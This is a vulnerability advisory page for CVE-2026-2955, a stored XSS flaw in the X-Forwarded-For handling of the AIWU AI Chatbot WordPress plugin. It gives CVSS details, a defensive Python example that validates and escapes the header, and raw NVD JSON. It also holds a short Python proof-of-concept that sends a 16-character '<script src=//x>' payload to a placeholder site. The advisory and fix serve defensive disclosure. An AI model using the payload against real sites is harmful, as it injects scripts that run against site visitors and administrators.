Security Vulnerability Report
CVE-2026-2955 CVSS 6.4 MEDIUM

CVE-2026-2955

Published: 2026-05-20 07:16:14
Last Modified: 2026-05-20 13:54:55

Description

The AI Chatbot & Workflow Automation by AIWU plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'X-Forwarded-For' header in versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Practical exploitation is constrained due to a 20-character storage limit.
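The defect described above is the classic CWE-79 pattern: a request header is stored as if it were data and later rendered as HTML. The following added example (written for this page, not code from the plugin or the advisory) models both halves of the fix for a header such as X-Forwarded-For. On input, the value is only accepted if its first hop parses as an IP address; on output, whatever was stored is HTML-escaped anyway, so a bad record that already sits in the database cannot run. It also shows why the 20-character limit mentioned in the advisory is not a mitigation: a `<script src=//x>` string is 16 characters and survives truncation intact. All header values and the `store_visitor_ip_*` function names are constructed for illustration.

```python
import html
import ipaddress
from typing import Optional

# Constructed sample header values for this example (not from the advisory).
SAMPLE_HEADERS = {
    "normal": "203.0.113.5, 10.0.0.1",
    "ipv6": "2001:db8::1",
    "payload": "<script src=//x>",  # 16 characters: fits a 20-char column
    "garbage": "not-an-ip",
}

STORAGE_LIMIT = 20  # the column width the advisory describes


def store_visitor_ip_vulnerable(xff_header: Optional[str]) -> Optional[str]:
    """Model of the vulnerable pattern: truncate and store the raw header.

    Truncation bounds the length but does nothing about the content, so a short
    HTML fragment is stored verbatim.
    """
    if not xff_header:
        return None
    return xff_header[:STORAGE_LIMIT]


def client_ip_from_xff(xff_header: Optional[str]) -> Optional[str]:
    """Input-side fix: return the first hop only if it is a well-formed IP address.

    Anything that is not an IP address is rejected rather than sanitized, because
    an IP column has no legitimate reason to hold markup. The result is the
    normalized form produced by the ipaddress module.
    """
    if not xff_header:
        return None
    first_hop = xff_header.split(",", 1)[0].strip()
    try:
        return str(ipaddress.ip_address(first_hop))
    except ValueError:
        return None


def store_visitor_ip_fixed(xff_header: Optional[str]) -> Optional[str]:
    """Validate first, then apply the storage limit to the validated value."""
    ip = client_ip_from_xff(xff_header)
    return ip[:STORAGE_LIMIT] if ip is not None else None


def render_visitor_row(stored_value: Optional[str]) -> str:
    """Output-side fix: escape at render time regardless of what was stored.

    This protects pages that display records written before the input fix was
    deployed. quote=True also escapes ' and " so the value is safe inside
    attribute values, not only between tags.
    """
    return "<td>" + html.escape(stored_value or "", quote=True) + "</td>"


if __name__ == "__main__":
    for label, value in SAMPLE_HEADERS.items():
        print(f"{label:8} raw-stored={store_visitor_ip_vulnerable(value)!r} "
              f"validated={store_visitor_ip_fixed(value)!r} "
              f"rendered={render_visitor_row(store_visitor_ip_vulnerable(value))}")
```

Either half alone closes this particular hole; shipping both is the usual advice because the output escape also covers records that were stored before the patch and any other code path that writes to the same column. A separate point for anyone keeping such a visitor log: X-Forwarded-For is client-controlled unless it is set by a reverse proxy you operate, so even a valid-looking address should only be trusted when the request arrived from that proxy.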

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AI Chatbot & Workflow Automation by AIWU <= 1.4.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept (PoC) for CVE-2026-2955
# This script demonstrates how to send a malicious payload via the X-Forwarded-For header.
# Note: The payload is limited to 20 characters.
import requests

target_url = "http://example-wordpress-site.com/"

# Payload: <script src=//x> (16 chars) - Attempts to load an external script
# This fits within the 20-character storage limit.
payload = "<script src=//x>"

headers = {
    "User-Agent": "PoC-Scanner/1.0",
    "X-Forwarded-For": payload,
}

try:
    response = requests.get(target_url, headers=headers)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Injected Payload: {payload}")
        print("[+] Check the admin panel or visitor logs to verify execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-2955", "sourceIdentifier": "[email protected]", "published": "2026-05-20T07:16:13.820", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AI Chatbot & Workflow Automation by AIWU plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'X-Forwarded-For' header in versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Practical exploitation is constrained due to a 20-character storage limit."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3505998/ai-copilot-content-generator", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8d434250-aa16-4ba1-a1f8-289371176545?source=cve", "source": "[email protected]"}]}}
```